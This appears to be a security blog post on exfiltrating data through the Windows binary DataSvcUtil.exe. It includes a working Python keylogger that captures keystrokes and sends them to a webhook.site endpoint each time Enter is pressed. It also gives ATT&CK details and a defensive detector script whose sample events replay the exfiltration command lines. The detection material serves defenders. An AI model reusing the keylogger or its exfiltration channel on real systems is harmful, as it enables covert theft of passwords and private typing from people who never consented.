Data Exfiltration with LOLBins

When it comes to data exfiltration, creativity and thinking outside the box are what matter most. To recall: the term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Graeber to describe the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts.

/uri:serviceuri — at this point you insert the URL that carries the data to be exfiltrated
Event with webhook.site
# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess

URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
content = ""

def on_press(key):
    global content
    global URL
    global uploader
    if str(key) == 'Key.backspace':
        content += ' '
    else:
        content += str(key)
    print(f'last key: {str(key)}')
    print("")
    if str(key) == 'Key.enter':
        upload_url = (f'{URL}?{content}')
        subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
        buffer = ''
    if key == 0x03:
        sys.exit(0)

if __name__ == "__main__":
    try:
        with Listener(on_press=on_press) as listener:
            listener.join()
    except (KeyboardInterrupt, SystemExit):
        sys.exit(0)
  • Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.exe
  • Sub-techniques: T1567.001, T1567.002
  • Tactic: Exfiltration
  • Requires Network: Yes
  • Platforms: Linux, Windows, macOS
  • Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
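The detection bullet above (DataSvcUtil.exe launched by something other than SYSTEM or LOCAL SERVICE) and the data sources listed can be turned into a concrete check. The following is an added example, not code from the original post: it applies that rule to a handful of constructed Sysmon-style process-creation records (field names follow Sysmon Event ID 1: Image, User, CommandLine, ParentImage). The internal DNS suffix, user names, parent paths and the webhook.site GUID are placeholders constructed for this example; both command-line shapes the post shows (the `/uri:` switch and the positional URL argument) are covered.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Accounts under which DataSvcUtil.exe is an expected (build-tooling) process,
# per the detection note: alert on launches by anyone else.
SERVICE_ACCOUNTS = {"nt authority\\system", "nt authority\\local service"}

# Assumption for this example: hosts under this suffix are the organisation's
# own OData services, so a /uri: pointing there is normal developer activity.
INTERNAL_SUFFIXES = (".corp.local",)

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events (not real telemetry). Event 0 is a legitimate
# build-agent run; 1 and 2 mirror the post's exfiltration pattern; 3 is noise.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe",
     "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r"DataSvcUtil.exe /out:C:\build\svc.cs /uri:http://buildsvc.corp.local/odata.svc",
     "ParentImage": r"C:\Program Files\BuildAgent\agent.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe",
     "User": r"CORP\jdoe",
     "CommandLine": r"DataSvcUtil.exe /out:C:\temp\test.xml /uri:https://webhook.site/00000000-0000-0000-0000-000000000000?Key.enter",
     "ParentImage": r"C:\Users\jdoe\AppData\Local\Programs\Python\python.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe",
     "User": r"CORP\jdoe",
     "CommandLine": r"DataSvcUtil.exe c:\temp\test.xml https://webhook.site/00000000-0000-0000-0000-000000000000?Key.aKey.bKey.enter",
     "ParentImage": r"C:\Users\jdoe\AppData\Local\Programs\Python\python.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "User": r"CORP\jdoe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def is_datasvcutil(image: str) -> bool:
    """True when the process image is DataSvcUtil.exe, whatever the directory."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "datasvcutil.exe"


def extract_urls(command_line: str) -> List[str]:
    """Pull every http(s) URL out of the command line, /uri: switch or positional."""
    return URL_RE.findall(command_line)


def is_internal(url: str) -> bool:
    """Destination is one of the assumed internal service hosts."""
    host = (urlparse(url).hostname or "").lower()
    return host.endswith(INTERNAL_SUFFIXES)


def assess_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert record for a suspicious DataSvcUtil.exe launch, else None."""
    if not is_datasvcutil(event.get("Image", "")):
        return None
    reasons: List[str] = []
    if event.get("User", "").lower() not in SERVICE_ACCOUNTS:
        reasons.append("launched by non-service account")
    for url in extract_urls(event.get("CommandLine", "")):
        host = urlparse(url).hostname or "?"
        if not is_internal(url):
            reasons.append(f"outbound request to external host {host}")
        if "?" in url:
            # Data riding in the query string is the post's exfiltration channel.
            reasons.append("query string carried in URL (possible data in request)")
    if not reasons:
        return None
    return {"User": event.get("User", ""),
            "CommandLine": event.get("CommandLine", ""),
            "reasons": reasons}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run assess_event over a batch of process-creation records."""
    return [alert for alert in (assess_event(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["User"], "->", "; ".join(alert["reasons"]))
        print("   ", alert["CommandLine"])
```

Matching on the image basename rather than the full path matters because the binary ships under both the Framework and Framework64 trees and in several version directories; the same check is what the process-monitoring data source above feeds.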

reverse engineering and malware tales | LinkedIn: @isdebuggerpresent
